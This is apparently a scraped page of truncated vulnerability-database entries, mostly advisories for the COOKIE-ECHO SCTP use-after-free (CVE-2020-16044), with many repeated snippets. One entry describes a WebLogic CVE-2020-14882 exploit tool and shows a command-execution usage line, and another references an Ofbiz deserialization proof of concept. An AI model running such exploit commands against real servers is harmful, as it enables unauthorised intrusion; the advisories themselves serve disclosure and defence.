PT-2024-11103 · Linux · Linux Kernel

Name of the Vulnerable Software and Affected Versions: Linux kernel affected versions not specified Description: The issue is caused by a transport use-after-free problem in the Linux kernel's SCTP implementation. When processing a duplicate COOKIE-ECHO chunk in sctp sf do dupcook a, both...

EulerOS 2.0 SP3 : bash (EulerOS-SA-2021-1765)

According to the version of the bash package installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A heap-based buffer overflow exists in GNU Bash before 4.3 when wide characters, not supported by the current locale set in the LCCTYPE environment...

GO-2021-0051 Directory traversal on Windows in github.com/labstack/echo/v4

Due to improper sanitization of user input on Windows, the static file handler allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read...

The vulnerability affects the implementation of the COOKIE-ECHO extension for WebRTC browsers such as Google Chrome, Mozilla Firefox, Firefox ESR, and Firefox for Android. This vulnerability allows a perpetrator to cause a service failure or execute arbitrary code.

The vulnerability of the COOKIE-ECHO extension implementation in WebRTC browsers such as Google Chrome, Mozilla Firefox, Firefox ESR, and Firefox for Android is related to the use of memory after it is freed. Exploiting this vulnerability can allow a remote attacker to cause a service failure or...

Exploit for Deserialization of Untrusted Data in Apache Ofbiz

CVE-2021-26295-POC This example demonstrates exploiting the C...

Exploit for CVE-2020-14882

CVE-2020-14882ALL CVE-2020-14882ALL综合利用工具，支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 需要模块：requests、http.client （工具仅用于授权的安全测试，请勿用于非法使用，违规行为与作者无关。） 命令回显模块已知成功版本：12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 选项 功能一：命令回显 python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "net user" python3 CVE-2020-14882ALL.py -u...

CentOS 8 : thunderbird (CESA-2021:0089)

The remote CentOS Linux 8 host has a package installed that is affected by a vulnerability as referenced in the CESA-2021:0089 advisory. - Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk CVE-2020-16044 Note that Nessus has not tested for this issue but has instead...

HosTaGe - Low Interaction Mobile Honeypot

HosTaGe is a lightweight, low-interaction, portable, and generic honeypot for mobile devices that aims on the detection of malicious, wireless network environments. As most malware propagate over the network via specific protocols, a low-interaction honeypot located at a mobile device can check...

Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk

Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

CentOS 7 : thunderbird (RHSA-2021:0087)

The remote CentOS Linux 7 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2021:0087 advisory. - Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

CentOS 7 : firefox (RHSA-2021:0053)

The remote CentOS Linux 7 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2021:0053 advisory. - Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

MGASA-2021-0027 Updated thunderbird packages fix a security vulnerability

Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk. CVE-2020-16044 See upstream releasenotes for other changes...

Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk

Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk

Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk

Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

SUSE SLED15 / SLES15 Security Update : MozillaFirefox (SUSE-SU-2021:0072-1)

This update for MozillaFirefox fixes the following issues : Firefox Extended Support Release 78.6.1 ESR - Fixed: Critical security issue MFSA 2021-01 bsc1180623 - CVE-2020-16044 Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk Note that Tenable Network Security has extracted...

Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk

Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk

Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...

Critical: Red Hat Security Advisory: firefox security update

An update for firefox is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from th...

Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk

Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...